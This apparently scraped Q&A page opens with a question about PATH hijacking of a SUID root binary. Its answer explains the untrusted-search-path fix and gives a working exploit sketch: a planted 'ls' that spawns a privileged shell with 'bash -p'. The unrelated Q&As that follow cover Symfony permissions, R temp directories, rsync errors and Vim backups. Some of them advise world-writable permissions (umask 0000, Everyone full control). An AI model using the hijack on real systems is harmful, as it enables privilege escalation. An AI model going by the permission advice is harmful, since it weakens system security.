I am working on a SUID root binary 'app' that runs a system("ls -la /dir") command, and I managed to exploit it by writing a malicious ls that gives me root and changing my user's PATH so that my directory takes priority over the system ones.
I noticed that executing it as my user returns a root shell, while executing it with sudo "./app" uses root's PATH and simply lists the files in /dir. As far as I know, setuid grants the owner's (in this case root's) privileges to the user, and sudo executes as root.
What are such vulnerabilities called? How would an app developer patch them? Is there any way I can force users to use sudo ./app to execute a program?
This kind of bug is generally called an untrusted search path (or PATH hijacking) vulnerability. To patch it, I recommend you change app to use an absolute path for the commands it runs. For example:
system("/bin/ls -la /dir");
Even if the users use the sudo command to execute it, there are sudo options they can use (such as --preserve-env) to preserve their own PATH, so sudo alone does not fix the problem.
If you want the users to run app using sudo, then there's no need for the binary to be SUID root.
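For reference, the PATH hijack you describe works roughly like this (a minimal sketch; the staging directory and the binary name ./app are assumptions):
# stage a malicious ls earlier in the search path
mkdir -p /tmp/evil
printf '#!/bin/bash\nexec /bin/bash -p\n' > /tmp/evil/ls   # -p stops bash from dropping the effective uid
chmod +x /tmp/evil/ls
PATH=/tmp/evil:$PATH ./app    # system() now resolves "ls" to /tmp/evil/ls
With system("/bin/ls -la /dir") the shell never consults PATH for the command, so the planted ls is ignored.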
Related
Before I executed an update (composer.phar update) as the root user, everything worked fine, but now when I try to run "assetic:dump --env=prod" I get a "Permission denied" error:
[Assetic\Exception\FilterException]
An error occurred while running:
'' '-jar' '/home/symfony/www/app/Resources/java/yuicompressor.jar' '--charset' 'UTF-8' '-o' '/tmp/YUI-OUT-vbRlyu' '--type' 'css' '/tmp/YUI-IN-OoRVHQ'
Error Output:
sh: 1: : Permission denied
Input:
meta.foundation-version{ ...
I tried all the solutions in this post: Fontawesome fonts fail after assets:install and assetic:dump.
Clearing the cache, chown, chgrp and chmod: nothing worked, always the same problem.
One way to deal with file permissions, when you are running a web-based application which requires either auto-deployment or constant manual updates (like using bin/console from Symfony2), is to make sure that the files belong to the user under which your application runs.
As you did not provide environment settings, I will make a few assumptions and provide you with a generic setup scenario; hopefully this will help guide you to the best solution for your specific case.
Environment Assumptions:
OS: a Linux flavor;
Web server: nginx, running as www-data;
PHP: php-fpm, running as apptest and using a socket connection for this application;
Generic set-up steps:
In the /etc/nginx/nginx.conf file, make sure that the user/group are set to www-data;
In the /etc/php5/fpm/pool.d/apptest.conf file, make sure that the user & group are set to apptest (a consolidated example of this pool file follows these steps);
TIP: The file above might need to be created; if that's the case, just copy the content of the www.conf file located in the same folder.
In the /etc/php5/fpm/pool.d/apptest.conf file, make sure listen.owner & listen.group are set to www-data;
Make sure that you have a line like the one below in this file /etc/php5/fpm/pool.d/apptest.conf:
listen = /var/run/php5-fpm.apptest.sock
NOTE: the php5-fpm.apptest.sock portion of the line above is the name of a file that does not exist yet but will be created when you restart PHP. The benefit is that you will have an isolated PHP process for this application;
a) In the case of nginx, if you are using socket connections, make sure your apptest conf file passes PHP requests to the socket:
fastcgi_pass unix:/var/run/php5-fpm.apptest.sock;
b) If you are using Apache with mod_fastcgi, the socket is referenced with a -socket argument in that conf file:
-socket /var/run/php5-fpm.apptest.sock;
If you are on a Linux box, create a user with no password; it should be called apptest.
Note: apptest is the name of your application; it will also be the user under which PHP runs, and it should also be the owner of the application files/folders.
Restart php and nginx/apache.
Tip: to change to a user which has no password on Linux, you need root privileges; run:
sudo -u apptest -i
After this, you should perform all your commands as the apptest user previously created, including running the symfony2 bin/console.
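Putting the php-fpm pieces together, the pool file from the steps above might look like this (a minimal sketch; the pm values are placeholders to adjust for your load):
; /etc/php5/fpm/pool.d/apptest.conf
[apptest]
user = apptest
group = apptest
listen = /var/run/php5-fpm.apptest.sock
listen.owner = www-data
listen.group = www-data
pm = dynamic
pm.max_children = 5
pm.start_servers = 2
pm.min_spare_servers = 1
pm.max_spare_servers = 3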
These are very generic steps, so if you need any clarification, let me know.
I do not recommend using root for updating. In my opinion the way to go is to have app/logs and app/cache writable for the server, and the src and vendor folders only readable for the server.
So let's say your user and group is coolman; then try this:
# everything is yours
chown coolman:coolman -R .
# everyone can access folders and read files; you as the owner can additionally write them
chmod ag=rX,u=rwX -R .
# full access to logs and cache for everyone (also the server)
chmod a+rwX -R app/logs app/cache
You make your composer update with your coolman user.
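If you are logged in as a different account, you can run the update as coolman like this (a minimal sketch, assuming sudo is configured and you are in the project directory):
sudo -u coolman composer update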
There is only one small problem left. The logs might be owned by www-data:www-data with rw-r--r--, so you cannot delete them. So just add a line to your app.php and your app/console file:
\umask(0000);
I think this line is commented out by default. It says that if no explicit rights are set within PHP, then every file which is created will get 0777 minus the mask, i.e. 0777, so you can delete the logs and cache.
I would like to create a cron job that removes a file every 24 hours, but it doesn't work for me!
emptyCache.php (permissions 755):
rm -rf app/cache/*
I use a cron job from OVH to do this; I followed the process, but the folder wasn't removed! My question is: is it the right command?
Here is an example of a script which should work on an OVH hosting plan (Pro 2014); you don't need to use any PHP or Symfony2 file or command:
File: /homez.807/[my_login]/symfony2/launch_commands.sh
#!/bin/bash
rm -rf /homez.807/[my_login]/symfony2/app/cache/*
It's simpler to put the full path of the directory you want to empty, but you can also use the cd command to change the directory and then delete the sub-directory.
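Don't forget to make the script executable, otherwise the cron will not be able to run it (a standard step; the path is the one assumed above):
chmod +x /homez.807/[my_login]/symfony2/launch_commands.sh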
And here is the configuration in the OVH manager (see the Cron tab). The ./ is the root of your web hosting, corresponding to /homez.807/[my_login]/. Here are the important options:
Script: we have to put the relative path (from the root of the web hosting) of the script: symfony2/launch_commands.sh
Language: Other, because the script should be executed by the shell, not the PHP interpreter
Logs: you should enable logs in order to send the result of the cron task by email
Description: choose an explicit name
When attempting to run R, I get this error:
Fatal error: cannot mkdir R_TempDir
I found two possible fixes for this problem by googling around. The first was to ensure my tmp directory didn't contain a load of subdirectories - it doesn't, and it's virtually empty. The second was to ensure that TMP, TMPDIR, and R_USER in my environment weren't set to non-existent paths - I didn't even have these set. Therefore, I created a tmp directory in my home directory and added its path to TMP in my environment. I was able to run R once, and then I got the fatal error again. Nothing was in the TMP directory that I set in my environment. Does anyone know what else I can try? Thanks.
Dirk is right, but misses a point: If /tmp is full, you can't create subdirectories there. Try
df /tmp
I just hit this on a shared server, where /tmp is mounted on its own partition and shared by many users. In this particular case you can't easily see whose fault it is, because permissions prevent you from seeing who is filling up the tmp partition; you basically have to ask the sysadmins to figure it out.
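If you do have enough read access, something like this shows the biggest offenders (a generic sketch; entries you cannot read are silently skipped):
du -sh /tmp/* 2>/dev/null | sort -h | tail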
Your default temporary directory appears to have the wrong permissions. Here I have
$ ls -ld /tmp
drwxrwxrwt 22 root root 4096 2011-06-10 09:17 /tmp
The key part is 'everybody' can read or write. You need that too. It certainly can contain subdirectories.
Are you running something like AppArmor or SE Linux?
Edit 2011-07-21: As someone just deemed it necessary to downvote this answer -- help(tempfile) is very clear on what values tmpdir (the default directory for temporary files or directories) tries:
By default, 'tmpdir' will be the directory given by 'tempdir()'. This
will be a subdirectory of the temporary directory found by the
following rule. The environment variables 'TMPDIR', 'TMP' and 'TEMP'
are checked in turn and the first found which points to a writable
directory is used: if none succeeds '/tmp' is used.
So my money is on checking those three environment variables. But AppArmor and SELinux have shown to be an issue too on some distributions.
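To check and set those variables from a shell before starting R (a minimal sketch; the directory name is an assumption):
echo "$TMPDIR $TMP $TEMP"    # see what R will try first
mkdir -p "$HOME/tmp"         # make sure the target exists and is writable
export TMPDIR="$HOME/tmp"
R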
Go to your user directory, create a file called .Renviron, add the following line, save it, and reopen RStudio, Rgui or Rterm:
TMP = '<path to folder where Everyone has full control>'
This worked with me on Windows 7
If you are running one of the rocker docker images (e.g., rocker/verse), you need to map a local directory to the /tmp directory in the container. For example,
docker run --rm -v ${PWD}/tmp:/tmp -p 8787:8787 -e PASSWORD=password rocker/verse:4.0.4
where ${PWD} for me is ~/devProjs/r, and I created a tmp directory inside it, so that the container's /tmp is mapped to my ~/devProjs/r/tmp directory.
Just had this issue and finally solved it. It was simply a Windows permission issue. Go to the environment variables and find the location of the temp folders. Then right-click the folder > Properties > Security > Advanced > give Everyone full control > tick "Replace all child object permission entries with inheritable permission entries from this object" > OK > OK.
This will also happen when your computer is completely, utterly out of space. Currently, my Mac has 0 kb free and it's causing this error. Freeing up some space solved the problem.
Check the user account you are launching RStudio with, then check the TMP system environment variable for its location. If the user launching RStudio has write access to those directories, you will not face this issue. Since you are facing it, all you have to do is change the permissions so that the user has write access to those directories.
Running R on a CentOS system, I had the same issue. I had to remove all R folders from the tmp directory; usually they have the form /tmp/Rtmp*****
So I deleted the folders from /tmp by running the below:
cd /tmp
rm -rf Rtmp*
The R shell worked for me afterwards.
I had this issue; the solution was slightly different. I run R on a Linux server, and it turned out that R had made a whole load of tempdirs when running cron jobs that had hung and not been cleaned up, clogging up the root /tmp directory with ~300 RtmpXXXXXX folders.
Using terminal access, I navigated to the /tmp folder did a recursive find/rm - deleting all of them using this command:
find . -type d -name 'Rtmp*' -exec rm -r -v {} \;
After this, Rstudio took a while to load up, but was once again happy and my scripts began to run again.
You will need the appropriate admin rights for this solution. And always be careful when running rm -r, especially with a find command, as it's easy to remove things unexpectedly.
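To preview what would be removed before committing to the rm (an optional, safer first pass):
find /tmp -maxdepth 1 -type d -name 'Rtmp*' -print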
When it comes to deleting tmp files, first make sure you know whether the files live on the server or on your local machine.
If they are on the remote server, first run df /tmp there to see what is using the most storage.
Then remove the files which cause the blocking: locally you can use file.remove("<file_name>") from within R (note that R's rm() only removes workspace objects, not files), and on the remote server use rm /tmp/<file_name> from a shell.
Moreover, you can also refer to https://support.rstudio.com/hc/en-us/articles/218730228-Resetting-a-user-s-state-on-RStudio-Server
I'm getting a confusing error from rsync and the initial things I'm finding from web searches (as well as all the usual chmod'ing) are not solving it:
rsync: failed to set times on "/foo/bar": Operation not permitted (1)
rsync error: some files could not be transferred (code 23)
at /SourceCache/rsync/rsync-35.2/rsync/main.c(992) [sender=2.6.9]
It seems to be working despite that error, but it would be nice to get rid of that.
If /foo/bar is on NFS (or possibly some FUSE filesystem), that might be the problem.
Either way, adding -O / --omit-dir-times to your command line will avoid it trying to set modification times on directories.
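For example (a generic sketch; the paths and host are placeholders):
rsync -av --omit-dir-times /local/dir/ user@remote:/foo/bar/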
The issue is probably due to /foo/bar not being owned by the writing process on a remote darwin (OS X) system.
A solution to the issue is to set an adequate owner on the remote side.
Since this answer has been voted, and therefore has been hopefully useful to someone, I'm extending it to make it clearer.
The reason why this happens is that rsync is probably trying to set an arbitrary modification time (mtime) when copying files.
In order to do this, darwin's utime() system function requires that the writing process's effective uid is either the same as the file's uid or the super-user's; see the opengroup utime page.
Check this discussion on rsync mailing list as reference.
As @racl101 has commented on an answer, this problem might be related to the folder owner. The rsync command should be run by the same user as the folder's owner. If it's not the same, you can change it:
chown -R userCorrect /remote/path/to/foo/bar
I had the same problem. For me the solution was to delete the remote file and let rsync create it again.
The problem in my case was that the receiver's mountpoint was incorrectly mounted: it was in read-only mode (for some strange reason).
It looked like rsync was copying the files, but it was not.
I checked my fstab file, changed the mount options back to defaults, re-mounted the file system and executed rsync again. All fine then.
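To check the current mount options of the destination before re-mounting (a generic sketch; replace /mnt/dest with your mountpoint):
findmnt -no OPTIONS /mnt/dest    # look for "ro" in the output
mount -o remount,rw /mnt/dest    # re-mount read-write (needs root)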
I've seen that problem when I'm writing to a filesystem which doesn't (properly) handle times -- I think SMB shares or FAT or something.
What is your target filesystem?
This happened to me on a partition of type xfs (rw,relatime,seclabel,attr2,inode64,noquota), where the directories were owned by another user in a group we were both members of. The group membership was already established before login, and the whole directory structure was group-writable. I had manually run sudo chown -R otheruser.group directory and sudo chmod -R g+rw directory to confirm this.
I still have no idea why it didn't work originally, but taking ownership with sudo chown -R myuser.group directory fixed it. Perhaps it was SELinux-related?
I came across this problem as well; the issue I was having was a permissions issue with the root folder that contained the files I was trying to send over. I don't care about that root folder being included with rsync, I just care about what's in it. The error was coming from my command, where I needed to specify an additional / at the end. If you do not have that trailing slash, rsync will attempt to set times on the folder.
Example:
This will attempt to set times on html
rsync /var/www/html/ ubuntu@xxx.xxx.xxx.xxx:html
This will not
rsync /var/www/html/ ubuntu@xxx.xxx.xxx.xxx:html/
This error might also pop up if you run the rsync process on files that were recently modified in the source or destination, because it can't set the time for the recently modified files.
I ran into this error trying to fix timestamps on a new macOS Monterey install, after the Migration Assistant decided to set all of them to the time the copy operation occurred instead of the original files' times.
anddam's answer did not help me, as the remote user used in the rsync command did match the directories and files owner.
After further research, I realised that I had no access to the Mac's Documents directory over SSH (error ls: Documents: Operation not permitted).
I managed to fix the problem by opening System Preferences on the Mac, selecting Security & Privacy, going to the Privacy tab, selecting Full Disk Access, and checking the box next to sshd-keygen-wrapper.
It could be that you don't have privileges to some of the files. From an administrator account, try "sudo rsync -av". Alternately, enable the root account and sign in as root. That should allow you to completely hose your system and brute-force your rsync! ;-) I'm not sure if the above-mentioned --extended-attributes option will help, but I threw it in too, just for good measure.
Problem 1: my Vim makes backups with the extension ~ in my root directory
I have the following line in my .vimrc
set backup backupdir=~/tmp/vim//,~/tmp//,.//,/var/tmp//,/tmp//$
However, I cannot see a root directory in that line.
Why does my Vim put backups of my shell scripts, with the extension ~, in my root directory?
Problem 2: my Zsh runs shell scripts which are in my PATH at login. For instance, my replaceUp shell script was started in my root directory at login. I keep it at ~/bin/shells/apps by default.
Why does Zsh run shell scripts which are in my PATH at login?
The files ending with ~ are backup files created by Vim when it overwrites a file (swap files are a different thing: they end in .swp and are controlled by the 'directory' option). You can try setting the backupdir and directory options:
set backupdir=~/tmp/vim//,~/tmp//,.//,/var/tmp//,/tmp//
set directory=~/tmp/vim//,~/tmp//,.//,/var/tmp//,/tmp//
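Note that Vim silently skips directories in those lists that don't exist and falls back to the next entry (eventually the current directory, which may explain the stray ~ files). Make sure the first entry exists (a minimal sketch):
mkdir -p ~/tmp/vim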